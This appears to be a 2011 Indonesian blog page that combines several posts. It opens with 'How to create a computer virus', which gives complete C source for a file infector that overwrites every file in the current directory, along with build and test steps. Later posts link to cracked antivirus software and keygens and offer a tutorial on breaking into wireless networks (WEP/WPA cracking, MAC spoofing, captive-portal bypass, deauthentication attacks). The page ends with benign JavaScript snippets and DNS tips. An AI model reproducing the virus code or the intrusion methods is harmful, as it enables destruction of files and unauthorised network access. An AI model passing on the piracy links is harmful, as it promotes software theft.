Kursor

Kamis, 29 September 2011

HOW TO CREATE A COMPUTER VIRUS

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect

Avira Premium + Crack

 Download :

http://adf.ly/2AW90

Keygen :

http://adf.ly/2OaVv
Posted Image
Spy Emergency 9.0.605.0 Multilingual | 16.8 MB

Spy Emergency is the anti spyware, anti malware, anti spam solution that fast and secure removes spyware, malware, spam and other internet threats from your computer. Spy Emergency protects you against thousands of various infections and potencially unwanted software, including spyware, adware, spam, virus, trojans, worms, homepage hijackers, remote administration tools, activex components, dialers, scumware, keyloggers, data mining software, toolbars, tracking cookies, browser, hijackers/BHO's.

Spy Emergency do not slow down your computer and still protects you while your are working not like others spyware removal software. Spy Emergency has more than 985,000 threat definitions in its signature database! Small and regular definition updates greatly reduce update downloading time. Spy Emergency is ready to fight malware on Windows Vista operating systems.

Spy Emergency Features:
- Support for Internet Explorer, Mozilla Firefox and Opera browsers
- Scan of your system memory
- Scan of your registry
- Scan of your storage
- Built-in anti-spam
- System directory storage scan
- Tracking cookies scan
- Host file scan
- Hijackers scan
- Heuristic malware detection
- Polymorhic malware detection
- Generic unpacker with support for UPX, Aspack
- Command line interface
- Automatic LSP stack repair
- Real-time memory shields that blocks spyware before it executes
- Prevention shields that blocks malware installation
- Browser shields, including homepage shield
- Tracking cookies shields
- Automatic database updates
- News updates
- Individual spy restore functionality
- Keeplist
- Scheduling support
- Simple configuration
- Intuitive and clear user interface for spyware removal
- Handy Shell Extension Scanning
- Skin support
- Language support
- Premium Technical support
- and much more...

OS : Win XP/2000/Vista/Win 7
Language : Multilingual


Download :
http://www.filesonic...1/9.0.605.0.rar
http://www.wupload.c...4/9.0.605.0.rar
http://www.fileserve...2/9.0.605.0.rar
Spyware Doctor 7.0.0.545 Full Patch

Spyware Doctor 7.0.0.545 merupakan salah satu program terbaik dalam melindungi komputer sobat blogger dari spyware, malware, adware, trojan, dan teman-temannya. Meskipun Spyware Doctor yang saya share disini bukan versi terbaru, namun Spyware Doctor versi ini juga sudah cukup untuk melindungi komputer sobat
Spyware Doctor 7.0.0.545
Spyware Doctor Tools :

* Spyware & Adware Scanner Keylogger
* Guard Popup
* Blocker Phishing
* Protector Real Time
* Protection Browser
* Guard Spyware Cookie
* Guard Malware
* Immunizer

Spyware Doctor 7.0.0.545 What's New in Spyware Doctor 7.0 :

* NEW! ThreatFire™ Behavioral Intelligence features next-generation technology to block new threats faster than traditional signature methods.
* NEW! Multi-layered browsing protection against web-based attacks, including phishing attempts, rogueware scare tactics and silent drive-by downloads, using a combination of reactive blacklists and proactive dynamic content analysis technologies.
* NEW! State Awareness Modes intuitively detect how you are using your PC and adjust to minimize performance impact and reduce interruptions.
* NEW! Browser Guard stops 'drive-by' downloads of fake AV or malicious files from compromised or exploit websites.
* NEW! Protection Statistics Report informs you of how PC Tools has protected your PC over the last 30 days.
* IMPROVED! Advanced rootkit detection technology identifies and removes hidden threats from your PC.
* IMPROVED! Built on a modular architecture which utilizes a diverse range of technologies that detect, block and remove threats attempting to compromise your PC.
* IMPROVED! Site Guard blocks you from visiting potentially unsafe or phishing websites and from downloading threats through your browser, IM or email.
* Cookie Guard automatically removes potentially malicious tracking and advertising cookies.

Download :
http://www.maknyos.com/ur6qong0z210/Spyware_Doctor_7.0.0.545_www.remo-xp.com

Pass :
www.remo-xp.com

TrustPort Antivirus 2012

TrustPort Antivirus 2012 12.0.0.4798 Multilanguage Incl Keys | 219 MB
The ideal basic protection from all types of spyware and viruses for your personal computer. The antivirus is regularly automatically updated and so is always prepared to stop the latest viruses, worms, trojans and malware in general. Heuristic analysis even allows the detection of those viruses which haven't been fully defined yet. The antivirus uses powerful technology with two scanning engines.

First-class antivirus and antispyware
- Permanent protection of your data
- Preventive computer scanning
- Automaticed removable media monitoring
- Detection of the latest threats
- Resistance to attacks
- Simple operation

On-access protection
Every program started and every file opened undergoes an antivirus check. The resident protection reliably blocks attempts to run malware. Depending on the repair settings the defective file is renamed, moved to quarantine or permanently deleted.

On-demand protection
It is possible to carry out regular or one-time scans of the entire disk, selected folders or files.
Scanning can be planned on regular weekly, daily or hourly cycles but of course it can also be carried out manually according to current needs.

High level of virus and spyware detection
Thanks to the use of two top-of-the-range scanning engines, the antivirus is able to achieve one of the highest detection rates in the world. It is able to detect and stop practically all existing viruses, worms and trojans.

Automated updates and upgrades
The antivirus is regularly automatically updated. Depending on the settings, virus signatures are downloaded at regular intervals, also new versions of the software are offered for downloading and installation. In this way, the computer is always totally protected.

Resistance against attacks
The system files of the antivirus are themselves protected against any attempts to change them by unauthorized applications. In this way, the malware has no chance of putting the antivirus out of action and of evading detection.

Application inspector - NEW!
This protection layer runs continuously in the background, and checks all suspicious activities within the file system and system registry. Anytime an application tries to access an unusual location, like a system file or a critical registry item, the antivirus will ask the user to allow or block the action.

Download :

http://www.wupload.com/file/92762547/TrustPort_Antivirus_12.0.0.4798.full.part1.rar http://www.wupload.com/file/92762548/TrustPort_Antivirus_12.0.0.4798.full.part2.rar http://www.wupload.com/file/92762549/TrustPort_Antivirus_12.0.0.4798.full.part3.rar http://www.filesonic.com/file/1656170501/TrustPort_Antivirus_12.0.0.4798.full.part1.rar http://www.filesonic.com/file/1656170511/TrustPort_Antivirus_12.0.0.4798.full.part2.rar http://www.filesonic.com/file/1656170521/TrustPort_Antivirus_12.0.0.4798.full.part3.rar

Windows Defender 1.1.1593

Windows Defender is software that helps protect your computer against pop-ups, slow performance, and security threats caused by spyware and other unwanted software by detecting and removing known spyware from your computer. Windows Defender features Real-Time Protection, a monitoring system that recommends actions against spyware when it's detected, minimizes interruptions, and helps you stay productive.

The benefits of installing Windows Defender include:

* Spyware detection and removal
* Improved Internet browsing safety
* Protection against the latest threats

Windows Defender is enhanced by SpyNet, a community that brings Windows Defender users together to identify and share information about spyware. This community reports potential threats identified by the Windows Defender real-time system agents to the SpyNet servers, which catalog and update the system to help protect you from new spyware threats.

Download :

http://www.microsoft.com/windows/antivirus-partners/windows-vista.aspx

NOD32 AntiVirus 5.0.93

ESET NOD32 Antivirus is the most effective protection you can find to combat today's huge volumes of Internet and email threats. It provides comprehensive antivirus and antispyware protection without affecting your computer's performance.

Using advanced ThreatSense® technology, ESET NOD32 Antivirus proactively protects you from new attacks, even during the critical first hours when other vendors' products aren't aware the attack even exists. ESET NOD32 Antivirus detects and disables both known and unknown viruses, trojans, worms, adware, spyware, rootkits and other Internet threats.

ESET NOD32 Antivirus is also one of the fastest antivirus solutions, so fast you won't even notice it running. And it's both incredibly easy to use yet simple to tailor for your specific needs.

Key Benefits:

Protection from the Unknown
Finds Malware Other AV Companies Missed
Built for Speed
Easy on Your System
Easy on You

Download :

http://filehippo.com/download_nod32/download/069b216627652ea5e246003c41ce39d8/

Contoh Java Script Untuk Protect Web anti click kanan , anti keyboard keydown ctrl +c, anti select text

// disable keydown ctrl c & v
<script language="javascript">
function onKeyDown() {
alert("dilarang copas"); // commentnya// current pressed key
var pressedKey = String.fromCharCode(event.keyCode).toLowerCase();
if (event.ctrlKey && (pressedKey == "c" ||
pressedKey == "v")) {
// disable key press porcessing
event.returnValue = false;
} } // onKeyDown</script>


<script language="JavaScript">
        //Disable klik kanan di mouse kamu
        
         
        //pesan yang akan ditampilkan bila kamu klik kanan
         var message="Maaf Tidak Boleh Copy Paste dengan Click Kanan";
         
        //Kode selanjutnya merupakan fungsi untuk mendisable klik kanannya
        function clickIE4(){
        if (event.button==2){
        alert(message);
        return false;
        }
        }
        function clickNS4(e){
        if (document.layers||document.getElementById&&!document.all){
        if (e.which==2||e.which==3){
        alert(message);
        return false;
        }
        }
        }
        if (document.layers){
        document.captureEvents(Event.MOUSEDOWN);
        document.onmousedown=clickNS4;
        }
        else if (document.all&&!document.getElementById){
        document.onmousedown=clickIE4;
        }
        document.oncontextmenu=new Function("alert(message);return false")
        </SCRIPT> 

<script TYPE="text/javascript">
<!--
//Disable select-text script (IE4+, NS6+)
///////////////////////////////////
function disableselect(e){
return false}
function reEnable(){
return true}
//if IE4+
document.onselectstart=new Function ("return false")
//if NS6if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable}
// -->
</SCRIPT>

MP3 Sound Cutter

Mp3 Sound Cutter merupakan software yg digunakan untuk memotong lagu.
Sesuai namanya Cutter yg berarti alat pemotong. Sofware ini dapat anda gunakan
untuk membuat ringtone (nada dering) handphone anda. Dengan
bantuan software ini anda dapat memutilasi lagu sesuai keinginan anda, anda dapat
mengambil reff, melody guitar, opening lagu, terserah anda deh.

Gua akan menjelaskan sedikit cara penggunaan software ini.
Pertama :
Download dulu MP3 Sound Cutter Disini Kemudian Instal (next aja trus ampe finish)
Gunakan Teknik crack Sebelum ngeCrack anda harus copy fille ke folder C:\Program File\MP3Cutter
Ini Contoh Screen Shot Mp3 Sound Cutter :
Posted Image

Keterangan :
a = Source song,tombol ini digunakan untuk memilih lagu mana yg ingin anda potong
b = Start cut, digunakan untuk memulai proses mutilasi lagu bukan mutilasi orang
c = End cut, digunakan untuk mengakhiri proses mutilasi lagu bukan mutilasi orang
d = Output song, digunakan untuk menyimpan file hasil mutilasi lagu bukan mutilasi orang

Menggunakan cukup mudah. Anda hanya perlu memilih lagu yg ingin di potong, kemudian
klik tombol start cut jika sudah dapat lagu yg bagus klik end cut kemudian di save. mudahkan

Jebol Password Wirreless

Kali ini saya mau berbagi ilmu tentang Password Wirreless yang menyebalkan... :642490:

Masalah keamanan merupakan hal yang sangat penting dalam jaringan komputer, terutama dalam jaringan wireless. Kehadiran berbagai vendor produk wireless yang menyajikan beragam produk dengan harga terjangkau turut andil menjadi pendorong maraknya penggunaan teknologi wireless. Teknologi wireless ini tidak hanya cocok untuk digunakan pada kantor ataupun pengguna bisnis. Pengguna rumahan juga bisa menggunakan teknologi ini untuk mempermudah konektivitas. Makalah ini lebih ditujukan untuk memberikan informasi mengenai ancaman serta cara cepat dan mudah untuk mengamankan jaringan wireless. Seperti sudah dibahas di awal, teknologi wireless memang relatif lebih rentan terhadap masalah keamanan. Sesuai namanya, teknologi wireless menggunakan gelombang radio sebagai sarana transmisi data. Proses pengamanan akan menjadi lebih sulit karena Anda tidak dapat melihat gelombang radio yang digunakan untuk transmisi data.
Kelemahan jaringan wireless secara umum dapat dibagi menjadi 2 jenis, yakni kelemahan pada konfigurasi dan kelemahan pada jenis enkripsi yang digunakan. Salah satu contoh penyebab kelemahan pada konfigurasi karena saat ini untuk membangun sebuah jaringan wireless cukup mudah. Banyak vendor yang menyediakan fasilitas yang memudahkan pengguna atau admin jaringan sehingga sering ditemukan wireless yang masih menggunakan konfigurasi wireless default bawaan vendor. Seringkali wireless yang dipasang pada jaringan masih menggunakan setting default bawaan vendor seperti SSID, IP Address, remote manajemen, DHCP enable, kanal frekuensi, tanpa enkripsi bahkan user/password untuk administrasi wireless tersebut masih standart bawaan pabrik.
WEP (Wired Equivalent Privacy) yang menjadi standart keamanan wireless sebelumnya, saat ini dapat dengan mudah dipecahkan dengan berbagai tools yang tersedia gratis di internet. WPA-PSK yang dianggap menjadi solusi menggantikan WEP, saat ini juga sudah dapat dipecahkan dengan metode dictionary attack secara offline.
Beberapa kelemahan pada jaringan wireless yang bisa digunakan attacker melakukan serangan antara lain:
1. Celah Keamanan
Banyak pengguna jaringan wireless tidak bisa membayangkan jenis bahaya apa yang sedang menghampiri mereka saat sedang berasosiasi dengan wireless access point (WAP), misalnya seperti sinyal WLAN dapat disusupi oleh hacker. Berikut ini dapat menjadi ancaman dalam jaringan wireless, di antaranya:
- Sniffing to Eavesdrop
Paket yang merupakan data seperti akses HTTP, email, dan Iain-Iain, yang dilewatkan oleh gelombang wireless dapat dengan mudah ditangkap dan dianalisis oleh attacker menggunakan aplikasi Packet Sniffer seperti Kismet.
- Denial of Service Attack
Serangan jenis ini dilakukan dengan membanjiri (flooding) jaringan sehingga sinyal wireless berbenturan dan menghasilkan paket-paket yang rusak.
- Man in the Middle Attack
Peningkatan keamanan dengan teknik enkripsi dan authentikasi masih dapat ditembus dengan cara mencari kelemahan operasi protokol jaringan tersebut. Salah satunya dengan mengeksploitasi Address Resolution Protocol (ARP) pada TCP/IP sehingga hacker yang cerdik dapat mengambil alih jaringan wireless tersebut.
- Rogue/Unauthorized Access Point
Rogue AP ini dapat dipasang oleh orang yang ingin menyebarkan/memancarkan lagi tranmisi wireless dengan cara ilegal/tanpa izin. Tujuannya, penyerang dapat menyusup ke jaringan melalui AP liar ini.
- Konfigurasi access point yang tidak benar
Kondisi ini sangat banyak terjadi karena kurangnya pemahaman dalam mengkonfigurasi sistem keamanan AP.
Kegiatan yang mengancam keamanan jaringan wireless di atas dilakukan dengan cara yang dikenal sebagai Warchalking, WarDriving, WarFlying, WarSpamming, atau WarSpying. Banyaknya access point/base station yang dibangun seiring dengan semakin murahnya biaya berlangganan koneksi Internet, menyebabkan kegiatan hacking tersebut sering diterapkan untuk mendapatkan akses Internet secara ilegal. Tentunya, tanpa perlu membayar.

2. Hide SSID
Banyak administrator menyembunyikan Services Set Id (SSID) jaringan wireless mereka dengan maksud agar hanya yang mengetahui SSID yang dapat terhubung ke jaringan mereka. Hal ini tidaklah benar, karena SSID sebenarnya tidak dapat disembuyikan secara sempurna. Pada saat saat tertentu atau khususnya saat client akan terhubung (assosiate) atau ketika akan memutuskan diri (deauthentication) dari sebuah jaringan wireless, maka client akan tetap mengirimkan SSID dalam bentuk plain text (meskipun menggunakan enkripsi), sehingga jika kita bermaksud menyadapnya, dapat dengan mudah menemukan informasi tersebut. Beberapa tools yang dapat digunakan untuk mendapatkan ssid yang di-hidden antara lain: kismet (kisMAC), ssid_jack (airjack), aircrack dan masih banyak lagi. Berikut meupakan aplikasi Kismet yang secang melakukan sniffing.

Posted Image

3. WEP
Teknologi Wired Equivalency Privacy atau WEP memang merupakan salah satu standar enkripsi yang paling banyak digunakan. Namun, teknik enkripsi WEP ini memiliki celah keamanan yang cukup mengganggu. Bisa dikatakan, celah keamanan ini sangat berbahaya. Tidak ada lagi data penting yang bisa lewat dengan aman. Semua data yang telah dienkripsi sekalipun akan bisa dipecahkan oleh para penyusup. Kelemahan WEP antara lain :

* Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
* WEP menggunakan kunci yang bersifat statis
* Masalah Initialization Vector (IV) WEP
* Masalah integritas pesan Cyclic Redundancy Check (CRC-32)

WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada kunci WEP 64 bit hanya 40 bit, sedang 24 bit merupakan Inisialisasi Vektor (IV). Demikian juga pada kunci WEP 128 bit, kunci rahasia terdiri dari 104 bit.
Pada dasarnya, setiap paket data yang dikirim dengan menggunakan enkripsi WEP terdiri dari Initialization Vector (IV) dan data yang terenkripsi berisi sebuah checksum (bagian untuk mengecek apakah ada perubahan pada data yang dikirimkan). Titik lemah WEP terletak pada IV yang panjangnya 24 bit. Sebuah algoritma biasanya digunakan untuk menghitung kode terenkripsi dari IV dan kunci WEP sebelum dikirim melalui WLAN. Penerima data akan merekonstruksi data dengan IV dan kunci WEP yang tentunya sudah ditentukan. Standar WEP sebenarnya menyarankan agar kode IV selalu berbeda untuk setiap paket data. Sayangnya, tidak semua produsen melakukan hal tersebut.
Pembuat standar WEP juga tidak menyebutkan bagaimana cara membuat IV. Pada umumnya digunakan random generator. Dengan digunakannya generator semacam ini, bisa dipastikan cepat atau lambat kode IV yang sama akan digunakan kembali. Para peneliti memperkirakan IV yang sama dipergunakan setiap 4.000-5.000 paket data. Setelah mengetahui prinsip dari WEP, penyusup hanya perlu menunggu digunakannya IV yang sama untuk kemudian menghitung kunci WEP dan selanjutnya masuk ke dalam jaringan. Pada tahap ini, penyusup bisa melakukan apa pun dalam jaringan wireless. Software untuk melakukan semua hal tersebut bisa didapatkan gratis di Internet. Dengan sedikit tambahan pengetahuan dan latihan, membuka enkripsi WEP dapat dilakukan dengan mudah. Dengan berbekal software tersebut, setiap orang bisa belajar menjadi penyusup.
Serangan diatas membutuhkan waktu dan packet yang cukup, untuk mempersingkat waktu, para hacker biasanya melakukan traffic injection. Traffic Injection yang sering dilakukan adalah dengan cara mengumpulkan packet ARP kemudian mengirimkan kembali ke access point. Hal ini mengakibatkan pengumpulan initial vektor lebih mudah dan cepat. Berbeda dengan serangan pertama dan kedua, untuk serangan traffic injection diperlukan spesifikasi alat dan aplikasi tertentu yang mulai jarang ditemui di toko-toko, mulai dari chipset, versi firmware, dan versi driver serta tidak jarang harus melakukan patching terhadap driver dan aplikasinya.
Aplikasi yang bisa digunakan untuk melakukan mengcapture paket yaitu Airodump. Berikut merupakan contoh aplikasi airodump yang sedang mengcaptute paket pada WLAN.

Posted Image

Setelah data yang dicapture mencukupi, dilakukan proses cracking untuk menemukan WEP key. Aplikasi yang bisa digunakan untuk melakukan menembus enkripsi WEP yaitu Aircrack. Berikut merupakan contoh aplikasi aircrak yang berhasil menemukan key WEP.

Posted Image

4. WPA-PSK atau WPA2-PSK
WPA merupakan teknologi keamanan sementara yang diciptakan untuk menggantikan kunci WEP. Ada dua jenis yakni WPA personal (WPA-PSK), dan WPA-RADIUS. Saat ini yang sudah dapat di crack adalah WPA-PSK, yakni dengan metode brute force attack secara offline. Brute force dengan menggunakan mencoba-coba banyak kata dari suatu kamus. Serangan ini akan berhasil jika passphrase yang digunakan wireless tersebut memang terdapat pada kamus kata yang digunakan si hacker. Untuk mencegah adanya serangan terhadap keamanan wireless menggunakan WPA-PSK, gunakanlah passphrase yang cukup panjang (satu kalimat).

5. MAC Filter
Hampir setiap wireless access point maupun router difasilitasi dengan keamanan MAC Filtering. Hal ini sebenarnya tidak banyak membantu dalam mengamankan komunikasi wireless, karena MAC address sangat mudah dispoofing atau bahkan dirubah. Tools ifconfig pada OS Linux/Unix atau beragam tools spt network utilitis, regedit, smac, machange pada OS windows dengan mudah digunakan untuk spoofing atau mengganti MAC address.
Masih sering ditemukan wifi di perkantoran dan bahkan ISP (yang biasanya digunakan oleh warnet-warnet) yang hanya menggunakan proteksi MAC Filtering. Dengan menggunakan aplikasi wardriving seperti kismet/kisMAC atau aircrack tools, dapat diperoleh informasi MAC address tiap client yang sedang terhubung ke sebuah Access Point. Setelah mendapatkan informasi tersebut, kita dapat terhubung ke Access point dengan mengubah MAC sesuai dengan client tadi. Pada jaringan wireless, duplikasi MAC address tidak mengakibatkan konflik. Hanya membutuhkan IP yang berbeda dengan client yang tadi.
Berikut merupakan daftar MAC address client yang terhubung ke sebuah access point dengan menggunakan tools kismet.

Posted Image

Untuk mengubah MAC address interface jaringan, cukup menggunakan tools sederhana seperti MAC MakeUp.

Posted Image

6. Captive Portal
Captive portal menjadi mekanisme populer bagi infrastruktur komunitas WiFi dan operator hotspot yang memberikan authentikasi bagi penguna infrastruktrur maupun manajemen flow IP, seperti, traffic shaping dan kontrol bandwidth, tanpa perlu menginstalasi aplikasi khusus di komputer pengguna. Proses authentication secara aman dapat dilakukan melalui sebuah web browser biasa di sisi pengguna. Captive portal juga mempunyai potensi untuk mengijinkan kita untuk melakukan berbagai hal secara aman melalui SSL & IPSec dan mengset rule quality of service (QoS) per user, tapi tetap mempertahankan jaringan yang sifatnya terbuka di infrastruktur WiFi.
Captive portal sebenarnya merupakan mesin router atau gateway yang memproteksi atau tidak mengizinkan adanya trafik hingga user melakukan registrasi/otentikasi. Berikut cara kerja captive portal :

* User dengan wireless client diizinkan untuk terhubung wireless untuk mendapatkan IP address (DHCP)
* Block semua trafik kecuali yang menuju ke captive portal (Registrasi/Otentikasi berbasis web) yang terletak pada jaringan kabel.
* Redirect atau belokkan semua trafik web ke captive portal
* Setelah user melakukan registrasi atau login, izinkan akses ke jaringan (internet)

Berikut contoh halaman login dari captive portal.

Posted Image


Beberapa hal yang perlu diperhatikan, bahwa captive portal hanya melakukan tracking koneksi client berdasarkan IP dan MAC address setelah melakukan otentikasi. Hal ini membuat captive portal masih dimungkinkan digunakan tanpa otentikasi karena IP dan MAC adress dapat di-spoofing. Serangan dilakukan dengan melakukan spoofing IP dan MAC. Spoofing MAC adress seperti yang sudah dijelaskan sebelumnya. Sedang untuk spoofing IP, diperlukan usaha yang lebih yakni dengan memanfaatkan ARP cache poisoning, dengan melakukan redirect trafik dari client yang sudah terhubung sebelumnya.
Serangan lain yang cukup mudah dilakukan adalah menggunakan Rogue AP, yaitu mengkonfigurasi Access Point yang menggunakan komponen informasi yang sama seperti AP target seperti SSID, BSSID hingga kanal frekwensi yang digunakan. Sehingga ketika ada client yang akan terhubung ke AP buatan kita, dapat kita membelokkan trafik ke AP sebenarnya.
Tidak jarang captive portal yang dibangun pada suatu hotspot memiliki kelemahan pada konfigurasi atau design jaringannya. Misalnya, otentikasi masih menggunakan plain text (http), managemen jaringan dapat diakses melalui wireless (berada pada satu network), dan masih banyak lagi. Kelemahan lain dari captive portal adalah bahwa komunikasi data atau trafik ketika sudah melakukan otentikasi (terhubung jaringan) akan dikirimkan masih belum terenkripsi, sehingga dengan mudah dapat disadap oleh para hacker. Untuk itu perlu berhati-hati melakukan koneksi pada jaringan hotspot, agar mengusahakan menggunakan komunikasi protokol yang aman seperti https,pop3s, ssh, imaps dst.
7. Wardrive
Wardrive adalah ekspedisi memancing elektronik untuk mencari jaringan wireless yang lemah. Kebanyakan, sebagian besar dari jaringan wireless tersebut bahkan tidak diberi password atau enkripsi untuk melindunginya. Kegiatan ini dilakukan untuk mencari jaringan mana saja yang akan dijadikan obyek serangan. Sehingga, kita bisa melakukan serangan terhadap jaringan wireless yang telah kita jadikan target. Untuk melakukan kegitan ini, hanya diperlukan peralatan sederhana. Kegiatan ini umumnya bertujuan untuk mendapatkan koneksi internet, tetapi banyak juga yang melakukan untuk maksud-maksud tertentu mulai dari rasa keingintahuan, coba coba, research, tugas praktikum, kejahatan dan lain lain.
Aplikasi untuk Site Survey/Wardrive “Netstumbler 0.4.0″
Langkah pertama dalam percobaan mengexploit suatu Wireless Network adalah menemukan Access Point. Tools yang bisa digunakan untuk melakukan hal ini yaitu NetStumbler. Tools ini sangan mudah digunakan untuk menemukan Signal dari Wireless Networking. Tools ini juga bisa mengukur kekuatan signal dan Noise yg dihasilkan karena banyaknya Connectivitas ke salah satu Access Point.
Hasil scanning dan analisa jaringan WLAN pada daerah kos-kosan sekitar IT Telkom menggunakan tools NetStumbler:

Posted Image

Grafik signal yang didapat menggunakan tools ini pada SSID “ittelkom”:

Posted Image


8. Kelemahan Protokol di Jaringan Wireless
Kelemahan-kelemahan dari jaringan wireless, sebenarnya tidak terlepas dari kelemahan berbagai macam protokol yang digunakannya, antara lain:
8.1 EAPOL (Extensible Authentication Protocol
EAPOL merupakan jenis protokol yang umum digunakan untuk authentikasi wireless dan point-to-point connection. Saat client resmi mengirimkan paket ke AP. AP menerima dan memberikan responnya, atau AP telah melakukan proses otorisasi. Dari protokol EAPOL, terdapat celah yang dapat digunakan untuk memperoleh nilai authentikasi.
Namun, nilai authentikasi hanya terdapat saat awal terjadinya komunikasi client resmi dengan AP. Selanjutnya, bila sudah terhubung, protokol EAPOL tidak muncul lagi, kecuali saat 10 ribu paket berikutnya muncul. Seorang hacker dapat mengirim {injection) paket EAPOL hasil spoofing yang berisikan spoofing alamat SSID yang telah diselaraskan, MAC Address dan IP Address dari source/destination.
Client resmi mengirimkan paket EAPOL agar mendapat respon dari AP untuk proses autentikasi. Selanjutnya, AP akan memerika ID Card dari client. Attacker memanfaatkan kelemahan protokol tersebut dengan membuat ID Card palsu agar dibolehkan masuk oleh AP dan mendapatkan nomor untuk memasuki ruangan yang sama.
8.2 Manajemen Beacon
Manajemen Beacon merupakan salah satu jenis protokol yang digunakan setiap AP untuk memancarkan sinyal RF untuk mengabarkan keberadaan AP. Bila dilakukan capture protokol Beacon dan men-decode-kannya, akan diperoleh kenyataan bahwa dalam setiap transmision rate-nya, manajemen Beacon mengirimkan sejumlah informasi, seperti SSID, jenis enkripsi, channel, MAC Address, dan Iain-Iain.
Kelemahan (vulnerability) yang dapat dimanfaatkan dari jenis protokol ini adalah sebagai berikut. Sebuah attacker client akan menangkap paket manajemen Beacon yang dipancarkan oleh AP. Selanjutnya, attacker client akan memancarkan kembali paket manajemen Beacon tersebut. Biasanya, nilai Beacon yang dipancarkan oleh AP sebesar 100ms. Bila attacker client menangkap Beacon AP, lalu memancarkan Beacon tersebut kembali, akan ada 2 Beacon yang sama. Source pengirim berbeda, namun berisikan informasi yang sama. Ini artinya ada dua AP yang sama berisikan informasi SSID, MAC Address, yang sama. Akibatnya, seluruh client tidak dapat berkomunikasi dengan AP yang sebenarnya, kecuali attacker berhenti mengirim sejumlah paket Beacon tersebut.
8.3 Deauthentkation/Disassociation Protocol
Istilah yang biasa digunakan untuk memanfaatkan celah protokol ini disebut dengan Deauthentication Broadcast Attack. Serangan ini akan membanjiri WLAN dengan Deauthentication packet sehingga mengacaukan wireless service pada client. Serangan jenis ini merupakan serangan yang paling berbahaya karena akan memutus koneksi client target atau seluruh client yang berasosiasi dengan AP Attacker melakukan permintaan pemutusan koneksi dengan memanfaatkan Deauthentication/Disassociation yang langsung direspon oleh AP. Seandainya ada sebuah perusahaan ISP yang terkena serangan ini, maka akan banyak keluhan dari pelanggan karena putusnya seluruh jaringan client.
Aplikasi yang bisa digunakan untuk serangan ini yaitu Aireplay. Berikut merupakan contoh kerja aplikasi Aircrak yang sedang melakukan Deauthentication Broadcast Attack.

Posted Image


8.4 Jamming Sinyal RF
Sinyal RF merupakan gelombang elektromagnetis yang dipergunakan untuk saling bertukar informasi melalui udara dari satu node ke node lainnya. Sekarang ini, sinyal RF sangat banyak digunakan, seperti untuk memancarkan gelombang radio FM, gelombang televisi atau sebagai sarana pengiriman data melalui jaringan nirkabel.
Sinyal RF memiliki kelebihan, namun juga memiliki kelemahan. Sinyal RF mudah terganggu oleh sistem yang berbasis RF eksternal lainnya, seperti cordless phone, microwave, perangkat Bluetooth, dan Iainnya. Saat perangkat tersebut digunakan secara bersamaan, kinerja jaringan nirkabel dapat menurun secara signifikan karena adanya persaingan dalam penggunaan medium yang sama. Pada akhirnya, gangguan tersebut dapat menyebabkan error pada bit-bit informasi yang sedang dikirim sehingga terjadi re-transmisi dan penundaan terhadap pengguna.
8.5 Manajemen Probe-Request
Saat client pertama kali berusaha untuk mengkoneksikan dirinya dengan AP, AP akan melakukan probe-respond untuk memeriksa apakah permintaan client untuk memasuki jaringan wireless tersebut diizinkan atau tidak. Celah yang dapat digunakan attacker adalah dengan melakukan manipulasi paket probe-respond. Selanjutnya, attacker melakukan permintaan probe-respond. Seandainya permintaan dilakukan dengan mengirimkan permintaan sebanyak-banyaknya, misalnya 500 paket dalam 1 detik, AP tidak akan mampu merespon paket yang begitu banyak. Artinya, AP tidak sanggup lagi berkomunikasi dengan client yang lain.

Hack Koneksi

di jaman sekarang, tarif internet semakain murah….. seperti yang diberikan oleh telkomsel dan indosat…… 2 operator itu menyediakan paket internet unlimited. namun ada beberapa kelemahan yang dimiliki oleh koneksi internet melalui broadband / koneksi internet nirkabel

saya memiliki beberapa cara untuk membuat koneksi internet semakin lancar, tanpa down atau putus2..

demikian caranya


1. instal program treewalk
http://www.ziddu.com/download/4080568/051111twdns.zip.html

2. setelah di instal ganti setting DNS dengan 127.0.0.1

cara setting DNS :

1. pilih start-control panel-network and internet connectins-netwok connection
2. klik kanan koneksi yang biasa anda gunakan / yang digunakan sekarang
3. pilih tab networking
4. klik internet protocol (TCP/IP) lalu pilih properti
5. centang atau tandai use the following DNS server addresses
6. masukan 127.0.0.1 pada prefered DNS server

selain itu, kita juga dapat menggunakan beberapa DNS yang dapat di coba dan dapa mempercepat dan membuat stabil koneksi internet

kalo menggunakan DNS di bawah ini tidak perlu menginstal treewalk

OpenDNS
* 208.67.222.222
* 208.67.220.220

telkom.net.id Daftar DNS TelkomNet
* 202.155.0.20
* 202.155.0.15
* 202.134.0.62
* 202.134.0.155
* 202.134.1.10
* 202.134.2.5
* 203.130.196.5

cbn.net.id
* 202.158.40.1
* 202.158.20.1

indo.net.id
